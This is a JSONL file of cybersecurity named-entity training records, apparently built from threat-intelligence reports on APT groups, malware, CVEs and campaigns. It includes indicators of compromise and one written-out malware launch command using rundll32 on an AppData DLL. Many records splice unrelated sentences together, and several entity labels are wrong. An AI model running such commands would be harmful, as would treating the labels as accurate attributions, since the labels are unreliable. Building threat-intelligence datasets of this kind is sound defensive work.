{"text": "This local port is used by Exodus Two to execute various commands on the Android device , such as enabling or disabling certain services , or parsing app databases . Suckfly conducted a multistage attack against an e-commerce organization . Corrupted file f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 . imgonline-com-ua-dexifEEdWuIbNSv7G.jpg : The FBI released an advisory warning users about NFT phishing scams where developers are often approached via social media and tricked into visiting a malicious link .", "spans": {"MALWARE: Exodus Two": [[27, 37]], "SYSTEM: Android": [[73, 80]], "ORGANIZATION: e-commerce organization": [[215, 238]], "FILEPATH: f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427": [[256, 320]], "FILEPATH: imgonline-com-ua-dexifEEdWuIbNSv7G.jpg": [[323, 361]], "ORGANIZATION: FBI": [[368, 371]]}, "info": {"id": "cyberner_stix_train_000387", "source": "cyberner_stix_train"}}
{"text": "While the attackers used different pretexts when sending these malicious emails , two methodologies stood out .", "spans": {"TOOL: emails": [[73, 79]]}, "info": {"id": "cyberner_stix_train_000388", "source": "cyberner_stix_train"}}
{"text": "If that doesn ’ t work , they try to use queryUsageStats : When the malware invokes queryUsageStats , it asks for the list of applications that ran in the last 1 million milliseconds ( 16 minutes and 40 seconds ) . In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT . control flow flattening , COSMICENERGY lacks discovery capabilities , which implies that to successfully execute an attack the malware operator would need to perform some internal reconnaissance to obtain environment information , such as MSSQL server IP addresses , MSSQL credentials , and target IEC-104 device IP addresses .", "spans": {"THREAT_ACTOR: Group123": [[238, 246]], "TOOL: HWP document": [[264, 276]], "TOOL: NavRAT": [[341, 347]], "MALWARE: COSMICENERGY": [[376, 388]], "THREAT_ACTOR: malware operator": [[477, 493]]}, "info": {"id": "cyberner_stix_train_000389", "source": "cyberner_stix_train"}}
{"text": "Suckfly : Revealing the secret life of your code signing certificates .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_000390", "source": "cyberner_stix_train"}}
{"text": "They exist in two types : the credentials stealers ( first 2 screenshots ) and the credit card grabbers ( last screenshot ) . But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email . BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment .", "spans": {"THREAT_ACTOR: SectorJ04": [[141, 150]], "THREAT_ACTOR: BRONZE BUTLER": [[213, 226]], "TOOL: emails": [[275, 281]]}, "info": {"id": "cyberner_stix_train_000391", "source": "cyberner_stix_train"}}
{"text": "One such immediately apparent connection was the similar deployment technique used by both XLoader 6.0 and FakeSpy . These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) . If performing receive operations in ping mode, Glimpse makes a query with the 0 action to contact the controller for . Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": {"MALWARE: XLoader 6.0": [[91, 102]], "MALWARE: FakeSpy": [[107, 114]], "TOOL: HTTPBrowser": [[222, 233]], "TOOL: Token Control": [[247, 260]], "THREAT_ACTOR: Wekby group": [[268, 279]], "MALWARE: Glimpse": [[404, 411]]}, "info": {"id": "cyberner_stix_train_000392", "source": "cyberner_stix_train"}}
{"text": "The sample we analyzed changed that behavior and hard-coded DWORD for each object type .", "spans": {}, "info": {"id": "cyberner_stix_train_000393", "source": "cyberner_stix_train"}}
{"text": "When a user enters an Internet banking site on a computer infected by banking malware ( ZeuS , Citadel ) , a request about the smartphone number and type of operating system is injected into the code of the authentication page . Kaspersky Lab documented this behavior in 2014 . Since ZxShell has been around since at least 2004 , numerous people have purchased or obtained the tools necessary to set up ZxShell command and control servers ( C&C ) and generate the malware that is placed on the victim ’s network . The RAT was likely not detected before as it has the ability to remove itself from the victim machine in time for the deployment of malware .", "spans": {"MALWARE: ZeuS": [[88, 92]], "MALWARE: Citadel": [[95, 102]], "ORGANIZATION: Kaspersky Lab": [[229, 242]], "MALWARE: ZxShell": [[284, 291], [403, 410]], "TOOL: command and control": [[411, 430]], "TOOL: C&C": [[441, 444]]}, "info": {"id": "cyberner_stix_train_000394", "source": "cyberner_stix_train"}}
{"text": "The root stash directory location may be read from the configuration file or set to the default location which is “ %MYPICTURES% ” .", "spans": {}, "info": {"id": "cyberner_stix_train_000395", "source": "cyberner_stix_train"}}
{"text": "Downeks .NET internal name is “ SharpDownloader ” , “ Sharp ” may be a reference to the language it was written in – C# .", "spans": {"MALWARE: Downeks": [[0, 7]], "MALWARE: SharpDownloader": [[32, 47]], "TOOL: C#": [[117, 119]]}, "info": {"id": "cyberner_stix_train_000396", "source": "cyberner_stix_train"}}
{"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks .", "spans": {"MALWARE: GRIFFON": [[8, 15]], "MALWARE: Plead": [[129, 134]], "MALWARE: malware": [[135, 142]], "MALWARE: backdoor": [[148, 156]], "ORGANIZATION: Trend Micro": [[178, 189]]}, "info": {"id": "cyberner_stix_train_000397", "source": "cyberner_stix_train"}}
{"text": "The code itself is not modified by this type of obfuscation though , making the analysis easier . It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in . CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations .", "spans": {"MALWARE: SWAnalytics": [[158, 169]], "ORGANIZATION: CTU": [[189, 192]]}, "info": {"id": "cyberner_stix_train_000398", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have evidence that the threat group compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_000399", "source": "cyberner_stix_train"}}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . In addition , the time stamp on the CA is new , which might mean that it was obtained specifically for this attack .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "ORGANIZATION: CA": [[195, 197]]}, "info": {"id": "cyberner_stix_train_000400", "source": "cyberner_stix_train"}}
{"text": "We now track this activity set as TEMP.Veles .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[34, 44]]}, "info": {"id": "cyberner_stix_train_000401", "source": "cyberner_stix_train"}}
{"text": "As more variants of Mirai emerged , so did the list IoT devices it was targeting .", "spans": {"TOOL: Mirai": [[20, 25]], "TOOL: IoT": [[52, 55]]}, "info": {"id": "cyberner_stix_train_000402", "source": "cyberner_stix_train"}}
{"text": "Various recruitment posts on Chinese job sites and Chinese National Enterprise Credit Information Public System ( NECIPS ) data led us one step further , linking the actor to its legal entity name . As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program . They also sell credentials from the affected systems , allowing other cybercriminals to have remote access to hotel front desks infected by the campaign . While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited , the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users .", "spans": {"SYSTEM: Chinese National Enterprise Credit Information Public System ( NECIPS )": [[51, 122]], "ORGANIZATION: Group-IB": [[209, 217]], "TOOL: Corkow": [[272, 278]], "ORGANIZATION: CISA": [[506, 510]], "ORGANIZATION: Microsoft": [[514, 523]], "ORGANIZATION: CISA report": [[601, 612]]}, "info": {"id": "cyberner_stix_train_000403", "source": "cyberner_stix_train"}}
{"text": "When a Germany-based industrial conglomerate disclosed in December 2016 that it was breached early that year , the breach was revealed to be a professionally run industrial espionage attack .", "spans": {"ORGANIZATION: industrial conglomerate": [[21, 44]]}, "info": {"id": "cyberner_stix_train_000404", "source": "cyberner_stix_train"}}
{"text": "The overall infection procedure was very similar to the WFCWallet case , but with an added injection procedure , and they only used the final backdoor payload instead of using a tunneling tool .", "spans": {"TOOL: WFCWallet": [[56, 65]]}, "info": {"id": "cyberner_stix_train_000405", "source": "cyberner_stix_train"}}
{"text": "Our decompilation of the serialization library was not complete enough to allow simple recompilation .", "spans": {"TOOL: serialization library": [[25, 46]]}, "info": {"id": "cyberner_stix_train_000406", "source": "cyberner_stix_train"}}
{"text": "Broadcast Receiver Figure 4 : MyReceiver broadcast receiver . It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 . Carbanak : Anunak , Carbon Spider .", "spans": {"ORGANIZATION: Symantec": [[81, 89]], "THREAT_ACTOR: Carbanak": [[158, 166]], "THREAT_ACTOR: Anunak": [[169, 175]], "THREAT_ACTOR: Carbon Spider": [[178, 191]]}, "info": {"id": "cyberner_stix_train_000407", "source": "cyberner_stix_train"}}
{"text": "Operation AppleJeus Sequel , Lazarus continues to attack the cryptocurrency business with enhanced capabilities .", "spans": {"THREAT_ACTOR: Lazarus": [[29, 36]]}, "info": {"id": "cyberner_stix_train_000408", "source": "cyberner_stix_train"}}
{"text": "In the image below , we see the malware function that detects such dialogs when they are presented to the user , asking them to tap an option based on predefined choices . These actors scan websites for vulnerabilities to exploit to illicitly access databases . This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks .", "spans": {"THREAT_ACTOR: actors": [[178, 184]], "MALWARE: Clayslide documents": [[302, 321]]}, "info": {"id": "cyberner_stix_train_000409", "source": "cyberner_stix_train"}}
{"text": "This IP is located in Los Angeles , U.S.A. , at a hosting company named “ Emagine Concept Inc ” . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data Exfiltration .", "spans": {"ORGANIZATION: Emagine Concept Inc": [[74, 93]], "MALWARE: documents": [[102, 111]], "VULNERABILITY: CVE-2012-0158": [[195, 208]], "VULNERABILITY: Microsoft Word vulnerabilities": [[264, 294]], "THREAT_ACTOR: PROMETHIUM": [[339, 349]]}, "info": {"id": "cyberner_stix_train_000410", "source": "cyberner_stix_train"}}
{"text": "The group was first publicly disclosed by FireEye in this report . The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection .", "spans": {"ORGANIZATION: FireEye": [[42, 49]], "VULNERABILITY: CVE-2012-0158": [[90, 103]]}, "info": {"id": "cyberner_stix_train_000411", "source": "cyberner_stix_train"}}
{"text": "They ’re a critical component of many dangerous industrial environments such as electric power generation and oil and gas processing .", "spans": {}, "info": {"id": "cyberner_stix_train_000412", "source": "cyberner_stix_train"}}
{"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe” utility to register a custom shim database file containing a patch onto a system .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[25, 33]], "THREAT_ACTOR: TRISIS": [[61, 67]], "ORGANIZATION: oil": [[186, 189]], "ORGANIZATION: gas industries": [[194, 208]], "THREAT_ACTOR: FIN7": [[277, 281]], "MALWARE: PowerShell script": [[311, 328]], "FILEPATH: sdbinst.exe”": [[345, 357]]}, "info": {"id": "cyberner_stix_train_000413", "source": "cyberner_stix_train"}}
{"text": "Within the unit , two divisions were involved in the breaches : one specializing in operations and the second in development and maintenance of hacking tools and infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_000414", "source": "cyberner_stix_train"}}
{"text": "We discovered the activity originated from three separate IP addresses , all located in Chengdu , China .", "spans": {}, "info": {"id": "cyberner_stix_train_000415", "source": "cyberner_stix_train"}}
{"text": "The package certificate is issued under the package name , which also resembles the name of the main DLL name . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea .", "spans": {"MALWARE: Mimikatz Lite": [[237, 250]], "MALWARE: GetPassword.exe": [[254, 269]], "THREAT_ACTOR: APT37": [[272, 277]]}, "info": {"id": "cyberner_stix_train_000416", "source": "cyberner_stix_train"}}
{"text": "This same keyword was also found in the njRAT c2 communication used in this attack .", "spans": {"MALWARE: njRAT": [[40, 45]], "TOOL: c2": [[46, 48]]}, "info": {"id": "cyberner_stix_train_000417", "source": "cyberner_stix_train"}}
{"text": "The BRONZE PRESIDENT cyberespionage group targets NGOs , as well as political and law enforcement organizations in countries in South and East Asia .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[4, 20]]}, "info": {"id": "cyberner_stix_train_000418", "source": "cyberner_stix_train"}}
{"text": "Understanding the “ how ” and “ why ” behind different entity classifications of similar ( or even the same ) activity allows us to move beyond the dismissive approach of “ everyone has their names for marketing purposes ” to a more productive mindset that grasps the fundamental methodologies that ( should ) drive these decisions .", "spans": {}, "info": {"id": "cyberner_stix_train_000419", "source": "cyberner_stix_train"}}
{"text": "The sample analyzed was targeted at Russian-speaking users , as most of the user interaction pages are written in Russian . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime .", "spans": {"THREAT_ACTOR: LYCEUM’s": [[159, 167]], "ORGANIZATION: executives": [[181, 191]], "ORGANIZATION: HR staff": [[194, 202]], "ORGANIZATION: IT personnel": [[209, 221]], "THREAT_ACTOR: APT38": [[286, 291]], "ORGANIZATION: financial institutions": [[327, 349]]}, "info": {"id": "cyberner_stix_train_000420", "source": "cyberner_stix_train"}}
{"text": ", included the kasper PDB string reported by Unit 42 , and used similar POST and GET requests .", "spans": {"ORGANIZATION: Unit 42": [[45, 52]]}, "info": {"id": "cyberner_stix_train_000421", "source": "cyberner_stix_train"}}
{"text": "In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"THREAT_ACTOR: APT32": [[28, 33]], "MALWARE: ActiveMime files": [[48, 64]], "ORGANIZATION: diplomats": [[167, 176]], "ORGANIZATION: journalists": [[272, 283]]}, "info": {"id": "cyberner_stix_train_000422", "source": "cyberner_stix_train"}}
{"text": "Based on Suckfly scanning for common ports , it ’s clear that the group was looking to expand its foothold on the e-commerce company 's internal network .", "spans": {"THREAT_ACTOR: Suckfly": [[9, 16]]}, "info": {"id": "cyberner_stix_train_000423", "source": "cyberner_stix_train"}}
{"text": "Project Spy ’ s earlier versions Searching for the domain in our sample database , we found that the coronavirus update app appears to be the latest version of another sample that we detected in May 2019 . Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns . The code tracks the block comparison variable in each predecessor and more ( if any conditional blocks before the predecessor ) When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users , the company ’s then - CEO Noel Biderman was quick to point the finger at an unnamed former contractor .", "spans": {"MALWARE: Project Spy": [[0, 11]], "ORGANIZATION: Palo Alto Networks": [[236, 254]], "ORGANIZATION: WildFire": [[268, 276]], "ORGANIZATION: AshleyMadison.com": [[619, 636]], "ORGANIZATION: Noel Biderman": [[761, 774]], "ORGANIZATION: unnamed former contractor": [[811, 836]]}, "info": {"id": "cyberner_stix_train_000424", "source": "cyberner_stix_train"}}
{"text": "The loader ’ s anti-debugger code is based on the following three methods : The first call aims to destroy the debugger connection : NOTE : This call completely stops the execution of WinDbg and other debuggers The second call tries to detect the presence of a debugger : The final call tries to destroy the possibility of adding software breakpoint : Finally , if the loader is happy with all the checks done so far , based on the victim operating system ( 32 or 64-bit ) it proceeds to decrypt a set of fake bitmap resources ( stage 2 We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country . The payload is encoded inside this image with the use of a technique called steganography , which utilizes the least significant bits of each pixel’s color code to store hidden information , without making overtly visible changes to the picture itself . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": {"THREAT_ACTOR: APT32": [[617, 622]], "ORGANIZATION: governmental organizations": [[1031, 1057]], "ORGANIZATION: political groups": [[1060, 1076]], "ORGANIZATION: think tanks": [[1081, 1092]], "ORGANIZATION: various individuals involved in defense and geopolitical related research": [[1106, 1179]]}, "info": {"id": "cyberner_stix_train_000425", "source": "cyberner_stix_train"}}
{"text": "The fake applications are built using WebView , a popular extension of Android ’ s View class that lets the developer show a webpage . The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 . APT38 's increasingly aggressive targeting against banks .", "spans": {"SYSTEM: WebView": [[38, 45]], "SYSTEM: Android": [[71, 78]], "TOOL: Poison Ivy": [[169, 179]], "THREAT_ACTOR: APT10": [[222, 227]], "THREAT_ACTOR: APT38": [[230, 235]], "ORGANIZATION: banks": [[281, 286]]}, "info": {"id": "cyberner_stix_train_000426", "source": "cyberner_stix_train"}}
{"text": "Unlike CosmicDuke and PinchDuke , GeminiDuke primarily collects information on the victim computer ’s configuration .", "spans": {"MALWARE: CosmicDuke": [[7, 17]], "MALWARE: PinchDuke": [[22, 31]], "MALWARE: GeminiDuke": [[34, 44]]}, "info": {"id": "cyberner_stix_train_000427", "source": "cyberner_stix_train"}}
{"text": "The actors likely log into sahro.bella7@post.cz and process the system information and screenshot sent by the Trojan to determine if the compromised host is of interest .", "spans": {"EMAIL: sahro.bella7@post.cz": [[27, 47]], "MALWARE: Trojan": [[110, 116]]}, "info": {"id": "cyberner_stix_train_000428", "source": "cyberner_stix_train"}}
{"text": "'' There are 27 response codes that the C2 can use to make requests to the trojan , which pretty much match what 's listed in the capabilities section . CTU research indicates that LYCEUM may have been active as early as April 2018 . Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship .", "spans": {"ORGANIZATION: CTU": [[153, 156]], "THREAT_ACTOR: LYCEUM": [[181, 187]], "THREAT_ACTOR: operational groups": [[409, 427]]}, "info": {"id": "cyberner_stix_train_000429", "source": "cyberner_stix_train"}}
{"text": "They did this at least 5 times between 18 April and 15 May . LAZARUS GROUP is responsible for attacks ranging from the 2014 attack on Sony Pictures to a number of Bitcoin heists in 2017 . The backdoor installed in the machine is more customized than that used by RevengeHotels : it ’s developed from scratch and is able to collect data from the clipboard and printer spooler , and capture screenshots . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": {"ORGANIZATION: Sony Pictures": [[134, 147]], "MALWARE: backdoor": [[192, 200]], "THREAT_ACTOR: RevengeHotels": [[263, 276]]}, "info": {"id": "cyberner_stix_train_000430", "source": "cyberner_stix_train"}}
{"text": "If the account exists , HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute .", "spans": {"MALWARE: HammerDuke": [[24, 34]]}, "info": {"id": "cyberner_stix_train_000431", "source": "cyberner_stix_train"}}
{"text": "start rundll32.exe “ C:\\Users\\user\\AppData\\Local\\cdnver.dll ” .", "spans": {"FILEPATH: rundll32.exe": [[6, 18]], "FILEPATH: C:\\Users\\user\\AppData\\Local\\cdnver.dll": [[21, 59]]}, "info": {"id": "cyberner_stix_train_000432", "source": "cyberner_stix_train"}}
{"text": "On Windows 10 , similar code integrity policies can be configured using Windows Defender Application Control . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . OceanLotus : {B578B063-93FB-4A5F-82B4-4E6C5EBD393B} ? 4 0 ( config+0x486 ) . The second path ( /Library / Fonts / ArialUnicode.ttf.md5.1 ) may be used to store logging information related to monitor activity that is described as follows .", "spans": {"SYSTEM: Windows 10": [[3, 13]], "SYSTEM: Windows Defender Application Control": [[72, 108]], "MALWARE: ChopShop1": [[111, 120]], "ORGANIZATION: MITRE Corporation": [[157, 174]], "THREAT_ACTOR: OceanLotus": [[326, 336]]}, "info": {"id": "cyberner_stix_train_000433", "source": "cyberner_stix_train"}}
{"text": "We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations .", "spans": {"FILEPATH: them": [[226, 230]]}, "info": {"id": "cyberner_stix_train_000434", "source": "cyberner_stix_train"}}
{"text": "Original code of the APK on the left , versus injected APK on the right The analysis of the APK was rather interesting , because some of the actions were very common spyware features , such as the exfiltration of SMS messages , call logs and other data . The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file . The malware creates 11 threads simultaneously : six threads are responsible for stealing information from the infected host , and five threads are for forwarding collected data to four cloud services ( Box , Dropbox , Pcloud and Yandex ) .", "spans": {"TOOL: dropper": [[500, 507]], "TOOL: Box": [[750, 753]], "TOOL: Dropbox": [[756, 763]], "TOOL: Pcloud": [[766, 772]], "TOOL: Yandex": [[777, 783]]}, "info": {"id": "cyberner_stix_train_000435", "source": "cyberner_stix_train"}}
{"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . The use of InPage as an attack vector is not commonly seen , with the only previously noted attacks being documented by Kaspersky in late 2016 .", "spans": {"MALWARE: UMBRAGE": [[0, 7]], "MALWARE: InPage": [[205, 211]], "ORGANIZATION: Kaspersky": [[314, 323]]}, "info": {"id": "cyberner_stix_train_000436", "source": "cyberner_stix_train"}}
{"text": "The change in the way the malware works today may be to help finance the campaign through fraudulent ad activity . APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats . In this case , If this is the primary reason why someone might be after your companys data , simple preventative measures could be used to deter these attacks from happening .", "spans": {"THREAT_ACTOR: APT39": [[115, 120]], "THREAT_ACTOR: groups": [[211, 217]], "ORGANIZATION: FireEye": [[218, 225]]}, "info": {"id": "cyberner_stix_train_000437", "source": "cyberner_stix_train"}}
{"text": "This variant of HenBox also used the common green Android figure as the app logo and was named 设置 ( “ Backup ” in English ) . Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities . The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system .", "spans": {"MALWARE: HenBox": [[16, 22]], "SYSTEM: Android": [[50, 57]], "THREAT_ACTOR: APT-C-09": [[138, 146]], "THREAT_ACTOR: Bitter": [[149, 155]], "THREAT_ACTOR: Donot": [[160, 165]], "THREAT_ACTOR: APT18": [[302, 307]], "MALWARE: hcdLoader RAT": [[327, 340]], "SYSTEM: Windows": [[363, 370]]}, "info": {"id": "cyberner_stix_train_000438", "source": "cyberner_stix_train"}}
{"text": "The Lookout Threat Intelligence team is increasingly seeing the same tradecraft , tactics , and procedures that APT-C-23 favors being used by other actors . Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey . In one instance , a large U.S. company was attacked in the same month a Middle Eastern company it co-owns was also compromised . The techniques leveraged during the incident suggest a growing maturity of Russia ’s offensive OT arsenal , including an ability to recognize novel OT threat vectors , develop new capabilities , and leverage different types of OT infrastructure to execute attacks .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[4, 31]], "MALWARE: APT-C-23": [[112, 120]], "THREAT_ACTOR: Lazarus": [[157, 164]], "ORGANIZATION: banks": [[278, 283]]}, "info": {"id": "cyberner_stix_train_000439", "source": "cyberner_stix_train"}}
{"text": "The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file , modified it to see the content ( misspelling the variable name along the way ) post-decoding , and uploaded it to see what it did in a sandbox .", "spans": {}, "info": {"id": "cyberner_stix_train_000440", "source": "cyberner_stix_train"}}
{"text": "This version adds one significant class — it requests DEVICE_ADMIN privileges . Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim . WATERSPOUT : APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted .", "spans": {"TOOL: Trochilus": [[86, 95]], "TOOL: RAT": [[107, 110]], "MALWARE: WATERSPOUT": [[308, 318]], "THREAT_ACTOR: APT29": [[321, 326]]}, "info": {"id": "cyberner_stix_train_000441", "source": "cyberner_stix_train"}}
{"text": "The impacted versions of the UPX library are 3.94 , 3.93 , and 3.92 .", "spans": {"TOOL: UPX": [[29, 32]]}, "info": {"id": "cyberner_stix_train_000442", "source": "cyberner_stix_train"}}
{"text": "EVENTBOT INFRASTRUCTURE By mapping the C2 servers , a clear , repeated pattern emerges based on the specific URL gate_cb8a5aea1ab302f0_c . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 .", "spans": {"MALWARE: EVENTBOT": [[0, 8]], "MALWARE: MSIL dropper": [[187, 199]], "MALWARE: Javascript (JS) dropper": [[254, 277]], "THREAT_ACTOR: threat groups": [[492, 505]], "THREAT_ACTOR: Oilrig1": [[516, 523]], "THREAT_ACTOR: CopyKittens2": [[528, 540]]}, "info": {"id": "cyberner_stix_train_000443", "source": "cyberner_stix_train"}}
{"text": "At the time of writing this research , four versions of the EventBot malware were observed : Version 0.0.0.1 , 0.0.0.2 , and 0.3.0.1 and 0.4.0.1 . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . In December 2015 , Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload .", "spans": {"MALWARE: EventBot": [[60, 68]], "MALWARE: sample": [[163, 169]], "ORGANIZATION: Unit 42": [[308, 315]], "MALWARE: Emissary Trojan": [[374, 389]]}, "info": {"id": "cyberner_stix_train_000444", "source": "cyberner_stix_train"}}
{"text": "We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": {"THREAT_ACTOR: APT10": [[15, 20]], "FILEPATH: exploit document": [[184, 200]], "MALWARE: KeyBoy": [[225, 231]], "FILEPATH: decoy document": [[258, 272]], "VULNERABILITY: exploit": [[315, 322]]}, "info": {"id": "cyberner_stix_train_000445", "source": "cyberner_stix_train"}}
{"text": "In some versions , the server would only return valid responses several days after the apps were submitted . In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor . The hook installed by ZxShell implements one of its filtering routine . A full report describing the timeline of DUCKTAIL ’s activities , a detailed analysis of its malware component , and appendices containing indicators of compromise , Yara detection rules , metadata , and MITRE ATT&CK techniques can be downloaded from a link on this page .", "spans": {"TOOL: software updates": [[147, 163]], "TOOL: ShadowPad backdoor": [[288, 306]], "MALWARE: ZxShell": [[331, 338]], "MALWARE: malware": [[474, 481]], "ORGANIZATION: Yara": [[547, 551]], "ORGANIZATION: MITRE ATT&CK": [[585, 597]]}, "info": {"id": "cyberner_stix_train_000446", "source": "cyberner_stix_train"}}
{"text": "specifically CVE-2018-0798 , before downloading subsequent payloads . Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations – not destructive attacks or fraud .", "spans": {"VULNERABILITY: CVE-2018-0798": [[13, 26]], "THREAT_ACTOR: Bahamut": [[81, 88]]}, "info": {"id": "cyberner_stix_train_000447", "source": "cyberner_stix_train"}}
{"text": "spear phishing : 69.87.223.26 .", "spans": {"IP_ADDRESS: 69.87.223.26": [[17, 29]]}, "info": {"id": "cyberner_stix_train_000448", "source": "cyberner_stix_train"}}
{"text": "For the hardware virtualization check , the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments . This particular OceanLotus malware loader attempts to imitate McAfee ’s McVsoCfg DLL and expects to be side-loaded by the legitimate \" On Demand Scanner \" executable . Seven of the vulnerabilities included in today ’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10 .", "spans": {"THREAT_ACTOR: APT32": [[177, 182]], "THREAT_ACTOR: OceanLotus Group": [[203, 219]], "ORGANIZATION: foreign corporations": [[235, 255]], "ORGANIZATION: governments": [[264, 275]], "THREAT_ACTOR: OceanLotus": [[294, 304]], "TOOL: McVsoCfg DLL": [[350, 362]]}, "info": {"id": "cyberner_stix_train_000449", "source": "cyberner_stix_train"}}
{"text": "In actual fact , the Trojan does not block anything and the phone can be used without any problems . The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" . Here is a short list of the types of tools included with ZxShell : A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": {"THREAT_ACTOR: WorldCupSec": [[166, 177]], "THREAT_ACTOR: TadjMakhal": [[184, 194]], "THREAT_ACTOR: Wipbot": [[201, 207]], "THREAT_ACTOR: Tavdig": [[215, 221]], "MALWARE: ZxShell": [[283, 290]], "ORGANIZATION: Hack520": [[345, 352]]}, "info": {"id": "cyberner_stix_train_000450", "source": "cyberner_stix_train"}}
